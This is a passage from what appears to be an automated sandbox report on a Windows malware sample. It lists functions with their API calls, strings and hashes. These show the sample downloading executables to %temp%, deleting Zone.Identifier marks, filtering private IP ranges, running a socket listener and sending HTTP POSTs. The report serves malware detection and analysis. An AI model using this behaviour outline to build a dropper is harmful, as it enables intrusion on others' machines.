                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryQueryVirtual
                                                                    • String ID: oA$ oA$ oA
                                                                    • API String ID: 2850889275-3725432611
                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                    Function 0040BE80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                    • String ID: Bz@
                                                                    • API String ID: 1815803762-793989200
                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                    Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                    • String ID:
                                                                    • API String ID: 3943618503-0
                                                                    • Opcode ID: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                    • Opcode Fuzzy Hash: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A
                                                                    Function 0040D4A0 Relevance: 3.0, APIs: 2, Instructions: 15timenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                    • RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Time$QuerySecondsSince1980System
                                                                    • String ID:
                                                                    • API String ID: 1987401769-0
                                                                    • Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                    • Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
                                                                    • Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                    • Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5
                                                                    Function 00404090 Relevance: 1.7, Strings: 1, Instructions: 488COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                    • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                                                    • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                    • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                                                    Function 00409EE0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcessHeaps.KERNEL32(000000FF,?), ref: 00409EFC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: HeapsProcess
                                                                    • String ID:
                                                                    • API String ID: 1420622215-0
                                                                    • Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                    • Instruction ID: 8d4b3b75e0ca4951d81b7fee5ffefe8b4dae6978097e516d12ce04c36a2bdc79
                                                                    • Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                    • Instruction Fuzzy Hash: 6B01ECB4904219CADB248F14D9847A9B778AB44304F1081E6D709B7282C2B85ECACF5E
                                                                    Function 0040A500 Relevance: .4, Instructions: 371COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7a4742e2e7356186e64ac596d0aac80efded56b294b4881e2932ca283d7c95dd
                                                                    • Instruction ID: ad55d0a0fc81490cd0e7a8c39e77b8496904da2014b800c37f86947748ff7242
                                                                    • Opcode Fuzzy Hash: 7a4742e2e7356186e64ac596d0aac80efded56b294b4881e2932ca283d7c95dd
                                                                    • Instruction Fuzzy Hash: DA128CB4D002199FCB08CF99D991AEEFBB2BF88304F24856AE415BB345D334AA15CF54
                                                                    Function 0040EE74 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                    • Instruction ID: 054a0bb403a3dad9bf0ef84f7a0700921875b898f10d87bbce24b5acd7998093
                                                                    • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                    • Instruction Fuzzy Hash: 4721B872900205AFC710EF79C880967FBA5FF45310B45857EE9559B286E734F925C7E0
                                                                    Function 0040EAE0 Relevance: 73.7, APIs: 34, Strings: 8, Instructions: 227filenetworksleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                    • rand.MSVCRT ref: 0040EB39
                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                    • rand.MSVCRT ref: 0040ED41
                                                                    • rand.MSVCRT ref: 0040ED55
                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.Mw
                                                                    • API String ID: 3709769524-1426338499
                                                                    • Opcode ID: cde54363ed6e66bf7c32733fe20a8141ebc92d2c64877f6f05ce73e4651f385c
                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                    • Opcode Fuzzy Hash: cde54363ed6e66bf7c32733fe20a8141ebc92d2c64877f6f05ce73e4651f385c
                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59
                                                                    Function 0040AEA0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 460 40aea0-40aeb7 call 40add0 463 40aeb9 460->463 464 40aebe-40aeda call 40aa20 strcmp 460->464 465 40b145-40b148 463->465 468 40aee1-40aefd call 40aa20 strstr 464->468 469 40aedc 464->469 472 40af40-40af5c call 40aa20 strstr 468->472 473 40aeff-40af1b call 40aa20 strstr 468->473 469->465 480 40af5e-40af7a call 40aa20 strstr 472->480 481 40af9f-40afbb call 40aa20 strstr 472->481 478 40af3b 473->478 479 40af1d-40af39 call 40aa20 strstr 473->479 478->465 479->472 479->478 488 40af9a 480->488 489 40af7c-40af98 call 40aa20 strstr 480->489 490 40afbd-40afd9 call 40aa20 strstr 481->490 491 40affe-40b014 EnterCriticalSection 481->491 488->465 489->481 489->488 502 40aff9 490->502 503 40afdb-40aff7 call 40aa20 strstr 490->503 492 40b01f-40b028 491->492 495 40b059-40b064 call 40b150 492->495 496 40b02a-40b03a 492->496 509 40b13a-40b13f LeaveCriticalSection 495->509 510 40b06a-40b078 495->510 499 40b057 496->499 500 40b03c-40b055 call 40d4a0 496->500 499->492 500->495 502->465 503->491 503->502 509->465 512 40b07a 510->512 513 40b07e-40b08f call 409d90 510->513 512->513 513->509 516 40b095-40b0b2 call 40d4a0 513->516 519 40b0b4-40b0c4 516->519 520 40b10a-40b122 516->520 521 40b0d0-40b108 call 40a1b0 519->521 522 40b0c6-40b0ce Sleep 519->522 523 40b128-40b133 call 40b150 520->523 521->523 522->519 523->509 528 40b135 call 40ab80 523->528 528->509
                                                                    APIs
                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                    • API String ID: 2906596889-2213908610
                                                                    • Opcode ID: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                    • Opcode Fuzzy Hash: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E
                                                                    Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 530 401920-401947 GetTickCount WaitForSingleObject 531 401ac9-401acf 530->531 532 40194d-401964 WSAWaitForMultipleEvents 530->532 533 4019f0-401a03 GetTickCount 532->533 534 40196a-401981 WSAEnumNetworkEvents 532->534 535 401a43-401a4c GetTickCount 533->535 536 401a05-401a14 EnterCriticalSection 533->536 534->533 537 401983-401988 534->537 538 401ab5-401ac3 WaitForSingleObject 535->538 539 401a4e-401a5d EnterCriticalSection 535->539 540 401a16-401a1d 536->540 541 401a3a-401a41 LeaveCriticalSection 536->541 537->533 542 40198a-401990 537->542 538->531 538->532 543 401aa1-401ab1 LeaveCriticalSection GetTickCount 539->543 544 401a5f-401a77 InterlockedExchangeAdd call 40d4a0 539->544 545 401a35 call 401820 540->545 546 401a1f-401a27 540->546 541->538 542->533 547 401992-4019b1 accept 542->547 543->538 555 401a97-401a9f 544->555 556 401a79-401a82 544->556 545->541 546->540 549 401a29-401a30 LeaveCriticalSection 546->549 547->533 551 4019b3-4019c2 call 4022c0 547->551 549->538 551->533 557 4019c4-4019df call 401740 551->557 555->543 555->544 556->555 558 401a84-401a8d call 40ab40 556->558 557->533 563 4019e1-4019e7 557->563 558->555 563->533 564 4019e9-4019eb call 401cf0 563->564 564->533
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                    • String ID: PCOI$ilci
                                                                    • API String ID: 3345448188-3762367603
                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99
                                                                    Function 0040E4F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E518
                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                    • API String ID: 2761394606-2217117414
                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54
                                                                    Function 00401600 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 96networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                    • String ID: PCOI$ilci$.Mw
                                                                    • API String ID: 2403999931-2607080227
                                                                    • Opcode ID: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                    • Opcode Fuzzy Hash: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98
                                                                    Function 00405880 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 00405898
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                    • ExitThread.KERNEL32 ref: 00405961
